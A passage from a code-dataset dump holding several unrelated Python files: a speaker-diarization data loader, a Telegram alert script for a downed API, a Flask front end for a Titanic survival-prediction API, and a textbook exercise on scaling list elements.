* np.ones(n_speakers).astype(np.int64)\n for seg in filtered_segments:\n speaker_index = speakers.index(self.data.utt2spk[seg['utt']])\n all_speaker_index = self.all_speakers.index(\n self.data.utt2spk[seg['utt']])\n S_arr[speaker_index] = all_speaker_index\n\n # If T[:, n_speakers - 1] == 0.0, then S_arr[n_speakers - 1] == -1,\n # so S_arr[n_speakers - 1] is not used for training,\n # e.g., in the case of training 3-spk model with 2-spk data\n\n Y = feature.transform(Y, self.input_transform)\n Y_spliced = feature.splice(Y, self.context_size)\n Y_ss, T_ss = feature.subsample(Y_spliced, T, self.subsampling)\n ilen = np.array(Y_ss.shape[0], dtype=np.int64)\n wav_data = {}\n wav_data['xs'] = Y_ss\n wav_data['ts'] = T_ss\n wav_data['ss'] = S_arr\n wav_data['ns'] = self.all_n_speakers_arr\n wav_data['ilens'] = ilen\n wav_data['rec'] = rec\n wav_data_list.append(wav_data)\n\n return wav_data_list\n\n def get_allnspk(self):\n return self.all_n_speakers\n\ndef collate_fn_ns(batch, n_speakers, spkidx_tbl):\n xs, ts, ss, ns, ilens = list(zip(*batch)) # feature, activity, speaker ID, speaker number, chunksize\n valid_chunk_indices1 = [i for i in range(len(ts))\n if ts[i].shape[1] == n_speakers] # 3 == n_speakers\n valid_chunk_indices2 = []\n\n # n_speakers (rec-data) > n_speakers (model)\n invalid_chunk_indices1 = [i for i in range(len(ts))\n if ts[i].shape[1] > n_speakers]\n\n ts = list(ts)\n ss = list(ss)\n for i in invalid_chunk_indices1:\n s = np.sum(ts[i], axis=0)\n cs = ts[i].shape[0]\n if len(s[s > 0.5]) <= n_speakers:\n # n_speakers (chunk-data) <= n_speakers (model)\n # update valid_chunk_indices2\n valid_chunk_indices2.append(i)\n idx_arr = np.where(s > 0.5)[0]\n ts[i] = ts[i][:, idx_arr]\n ss[i] = ss[i][idx_arr]\n if len(s[s > 0.5]) < n_speakers:\n # n_speakers (chunk-data) < n_speakers (model)\n # update ts[i] and ss[i]\n n_speakers_real = len(s[s > 0.5])\n zeros_ts = np.zeros((cs, n_speakers), dtype=np.float32)\n zeros_ts[:, :-(n_speakers-n_speakers_real)] = ts[i]\n ts[i] = zeros_ts\n mones_ss = -1 * np.ones((n_speakers,), dtype=np.int64)\n mones_ss[:-(n_speakers-n_speakers_real)] = ss[i]\n ss[i] = mones_ss\n else:\n # n_speakers (chunk-data) == n_speakers (model)\n pass\n else:\n # n_speakers (chunk-data) > n_speakers (model)\n pass\n\n # valid_chunk_indices: chunk indices using for training\n valid_chunk_indices = sorted(valid_chunk_indices1 + valid_chunk_indices2)\n\n ilens = np.array(ilens)\n ilens = ilens[valid_chunk_indices]\n ns = np.array(ns)[valid_chunk_indices]\n ss = np.array([ss[i] for i in range(len(ss))\n if ts[i].shape[1] == n_speakers])\n xs = [xs[i] for i in range(len(xs)) if ts[i].shape[1] == n_speakers]\n ts = [ts[i] for i in range(len(ts)) if ts[i].shape[1] == n_speakers]\n xs = np.array([np.pad(x, [(0, np.max(ilens) - len(x)), (0, 0)],\n 'constant', constant_values=(-1,)) for x in xs])\n ts = np.array([np.pad(t, [(0, np.max(ilens) - len(t)), (0, 0)],\n 'constant', constant_values=(+1,)) for t in ts])\n\n if spkidx_tbl is not None:\n # Update global speaker ID\n all_n_speakers = np.max(spkidx_tbl) + 1\n bs = len(ns)\n ns = np.array([\n np.arange(\n all_n_speakers,\n dtype=np.int64\n ).reshape(all_n_speakers, 1)] * bs)\n ss = np.array([spkidx_tbl[ss[i]] for i in range(len(ss))])\n\n return (xs, ts, ss, ns, ilens)\n\n\ndef collate_fn(batch):\n xs, ts, ss, ns, ilens = list(zip(*batch))\n ilens = np.array(ilens)\n xs = np.array([np.pad(\n x, [(0, np.max(ilens) - len(x)), (0, 0)],\n 'constant', constant_values=(-1,)\n ) for x in xs])\n ts = np.array([np.pad(\n t, [(0, np.max(ilens) - len(t)), (0, 0)],\n 'constant', constant_values=(+1,)\n ) for t in ts])\n ss = np.array(ss)\n ns = np.array(ns)\n\n return (xs, ts, ss, ns, ilens)\n\ndef save_feature(args):\n # Set seed for reproducibility\n np.random.seed(args.seed)\n torch.manual_seed(args.seed)\n torch.backends.cudnn.deterministic = True\n os.environ['PYTORCH_SEED'] = str(args.seed)\n torch.backends.cudnn.benchmark = False\n\n # device = [device_id for device_id in range(torch.cuda.device_count())]\n device = [1]\n print('GPU device {} is used'.format(device))\n\n train_set = DiarizationDatasetFromWave(\n args.train_data_dir,\n chunk_size=args.chunk_size,\n context_size=args.context_size,\n input_transform=args.input_transform,\n frame_size=args.frame_size,\n frame_shift=args.frame_shift,\n subsampling=args.subsampling,\n rate=args.sampling_rate,\n n_speakers=args.num_speakers,\n )\n\n # Count n_chunks\n batchsize = args.batchsize * len(device) * \\\n args.batchsize_per_gpu\n f = open('{}/batchsize.txt'.format(args.model_save_dir), 'w')\n f.write(\"{}\\n\".format(batchsize))\n f.close()\n trainloader = torch.utils.data.DataLoader(\n train_set, batch_size=batchsize,\n shuffle=False, num_workers=args.num_workers,\n collate_fn=partial(\n collate_fn_ns,\n n_speakers=args.num_speakers,\n spkidx_tbl=None)\n )\n n_chunks = len(trainloader)\n print(\"n_chunks : {}\".format(n_chunks))\n os.makedirs(\"{}/data/\".format(args.model_save_dir), exist_ok=True)\n f = open('{}/data/n_chunks.txt'.format(args.model_save_dir), 'w')\n f.write(\"{}\\n\".format(n_chunks))\n f.close()\n\n if n_chunks % args.feature_nj == 0:\n max_num_per_dir = n_chunks // args.feature_nj\n else:\n max_num_per_dir = n_chunks // args.feature_nj + 1\n print(\"max_num_per_dir : {}\".format(max_num_per_dir))\n\n # Save featlab_XXXXXXXX.npy and featlab_chunk_indices.txt\n spkidx_tbl = None\n if args.initmodel:\n # adaptation\n npz = np.load(args.spkv_lab)\n spkidx_tbl = npz['arr_2']\n\n trainloader = torch.utils.data.DataLoader(\n train_set, batch_size=batchsize,\n shuffle=False, num_workers=args.num_workers,\n collate_fn=partial(\n collate_fn_ns,\n n_speakers=args.num_speakers,\n spkidx_tbl=spkidx_tbl)\n )\n f = open('{}/data/featlab_chunk_indices.txt'.\n format(args.model_save_dir), 'w')\n idx = 0\n digit_num = len(str(args.feature_nj-1))\n fmt = \"{}/data/{:0={}}/featlab_{:0=8}.npy\"\n for data in trainloader:\n dir_num = idx // max_num_per_dir\n os.makedirs(\"{}/data/{:0={}}/\".\n format(args.model_save_dir, dir_num, digit_num),\n exist_ok=True)\n output_npy_path = fmt.format(args.model_save_dir,\n dir_num, digit_num, idx)\n print(output_npy_path)\n bs = data[0].shape[0] #batch size\n cs = data[0].shape[1] #chunk size\n # data0 (feature)\n data0 = data[0]\n # data1 (reference speech activity)\n data1 = data[1]\n # data2 (reference speaker ID)\n data2 = np.zeros([bs, cs, data[2].shape[1]], dtype=np.float32)\n for j in range(bs):\n data2[j, :, :] = data[2][j, :]\n # data3 (reference number of all speakers)\n data3 = np.ones([bs, cs, 1], dtype=np.float32) * len(data[3][0])\n # data4 (real chunk size)\n data4 = np.zeros([bs, cs, 1], dtype=np.float32)\n for j in range(bs):\n data4[j, :, :] = data[4][j]\n save_data = np.concatenate((data0,\n data1,\n data2,\n data3,\n data4), axis=2)\n\n np.save(output_npy_path, save_data)\n for j in range(save_data.shape[0]):\n f.write(\"{} {}\\n\".format(output_npy_path, j))\n idx += 1\n f.close()\n\n # Create completion flag\n f = open('{}/data/.done'.format(args.model_save_dir), 'w')\n f.write(\"\")\n f.close()\n print('Finished!')\n\n\ndef collate_fn_test(batch, n_speakers, spkidx_tbl):\n data_list = list(*batch)\n ms = len(batch)\n bs = len(data_list)\n cs = None\n new_data = None\n for data in data_list:\n xs = data['xs']\n ts = data['ts']\n ss = data['ss']\n ns = data['ns']\n ilens = data['ilens']\n \n\n xs = np.array([np.pad(xs, [(0, np.max(ilens) - len(xs)), (0, 0)],\n 'constant', constant_values=(-1,))])\n ts = np.array([np.pad(ts, [(0, np.max(ilens) - len(ts)), (0, 0)],\n 'constant', constant_values=(+1,))])\n\n\n if cs == None:\n cs = ts.shape[1]\n data0 = xs\n data1 = ts\n data2 = np.zeros([1,cs, ts.shape[2]], dtype=np.float32)\n for j in range(cs):\n data2[0, j, :] = ss[:]\n data3 = np.ones([1, cs, 1], dtype=np.float32) * len(ns)\n data4 = np.zeros([1, cs, 1], dtype=np.float32)\n for j in range(cs):\n data4[0, j, :] = ilens\n\n new_data = np.concatenate((data0,\n data1,\n data2,\n data3,\n data4), axis=2)\n else:\n cs = ts.shape[1]\n data0 = xs\n data1 = ts\n data2 = np.zeros([1,cs, ts.shape[2]], dtype=np.float32)\n for j in range(cs):\n data2[0, j, :] = ss[:]\n data3 = np.ones([1, cs, 1], dtype=np.float32) * len(ns)\n data4 = np.zeros([1, cs, 1], dtype=np.float32)\n for j in range(cs):\n data4[0, j, :] = ilens\n\n tmp_data = np.concatenate((data0,\n data1,\n data2,\n data3,\n data4), axis=2) \n new_data = np.concatenate((new_data, tmp_data), axis=0) \n \n return new_data\n\ndataset = DiarizationDatasetFromWaveTest(\n args.train_data_dir,\n chunk_size=args.chunk_size,\n context_size=args.context_size,\n input_transform=args.input_transform,\n frame_size=args.frame_size,\n frame_shift=args.frame_shift,\n subsampling=args.subsampling,\n rate=args.sampling_rate,\n n_speakers=args.num_speakers,\n)\n\n\n\ndataloader = torch.utils.data.DataLoader(\n dataset, batch_size=1,\n shuffle=True, num_workers=args.num_workers,\n collate_fn=partial(\n collate_fn_test,\n n_speakers=args.num_speakers,\n spkidx_tbl=None)\n)\n\nfor data in dataloader:\n tmp = data\n","repo_name":"biubiugun/EEND-VC","sub_path":"eend/pytorch_backend/loader_test.py","file_name":"loader_test.py","file_ext":"py","file_size_in_byte":20273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"70042645308","text":"# модуль для рассылки алерта что какой то из APi упал через моего телеграм бота bot API\nimport settings as s\nimport requests\nfrom datetime import datetime\n\n\ndef send_bot_alert(host, message):\n print('start send by bot_api ....')\n # узнаем текущие дату время\n datetime_str = str(datetime.now())\n\n # data = {\"chat_id_list\": [\"322734040\", \"72205748\"],\n data = {\"chat_id_list\": [\"322734040\"],\n \"message\": {\n \"quiz\": \"=========ALERT!===========\",\n \"Номер телефона\": \"Dentolo check API service\",\n \"Результаты опроса\": f\"Внимание, коллеги!! наше API {s.tmp_endpoint} не отвечает/упало!!\",\n \"service\": \"Dentolo check API service\",\n \"href\": f\"{s.tmp_endpoint}\",\n \"Домен\": f\"{s.tmp_endpoint}\",\n \"Время\": f\"{datetime_str}\",\n },\n }\n\n req = requests.post(url=s.bot_api_endpoint, headers=s.bot_api_header, json=data)\n print(req.status_code)\n","repo_name":"homebrewdev/API_ping","sub_path":"send2_telegram_bot.py","file_name":"send2_telegram_bot.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"33561399091","text":"from flask import Blueprint, render_template, url_for, redirect, request\nfrom .__init__ import db, Info\nimport requests\n\npages = Blueprint('pages', __name__)\n\n\n@pages.route('/')\ndef principal():\n return render_template('principal.html')\n\n\n@pages.route('/', methods = ['GET', 'POST'])\ndef principal_input():\n # saving values from the formulary in variables\n user_name = request.form.get('user_name')\n user_age = request.form.get('user_age')\n user_fare = request.form.get('user_fare')\n user_sex = request.form.get('user_sex')\n user_pclass = request.form.get('user_pclass')\n user_parch = request.form.get('user_parch')\n user_sibsp = request.form.get('user_sibsp')\n\n # dict for formulary variables and API keys\n user_data = {'Age': user_age, 'Pclass': user_pclass,\n 'Sex': user_sex, 'Fare': user_fare,\n 'Parch': user_parch, 'SibSp': user_sibsp}\n\n # making API requests\n api_response = requests.get('http://127.0.0.1:5000/API/', user_data)\n json_response = api_response.json()\n text = json_response['Prediction']\n prob = json_response['Probability of survive']\n\n # saving API data in table\n user = Info(name = user_name, text = text, prob=prob)\n db.session.add(user)\n db.session.commit()\n\n if prob >= 50:\n return redirect(url_for('pages.alive'))\n\n return redirect(url_for('pages.dead'))\n\n\n@pages.route('/dead')\ndef dead():\n # this query takes the last input in the table\n user = Info.query.order_by(Info.id.desc()).first()\n return render_template('dead.html', user= user)\n\n@pages.route('/alive')\ndef alive():\n user = Info.query.order_by(Info.id.desc()).first()\n return render_template('alive.html', user=user)\n","repo_name":"Breno-Valle/titanic_website","sub_path":"ML_API/pages.py","file_name":"pages.py","file_ext":"py","file_size_in_byte":1725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"73605302","text":"# In our implementation of the scale function (page 25) the body of the loop executes the command data[j] *= factor. We have discussed that numeric types are immutable, and that use of the *= operator in this contex causes the creation of a new instance (not the mutation of an existing instance). How is it still possible, then that our implementaton of scale changes the actual parameter sent by the caller?\r\n\r\ndef scale(data, factor):\r\n for i in data:\r\n i *= factor\r\n return data\r\n \r\n\r\n\r\n\r\n#print(\"Bad scaling\")\r\n#data = [1, 2, 4]; print(data)\r\n#scale(data, 4); print(data)\r\n\r\ndef realscale(data, factor):\r\n for i in range (len(data)):\r\n data[i]*= factor\r\n return data\r\n\r\n\r\n\r\nv = realscale([1,2,4,5,6,7,8,9,1,2,22,33,44,54], 55)\r\nprint(v)","repo_name":"archimedessena/algo-in-python","sub_path":"chapter1/ex16.py","file_name":"ex16.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"}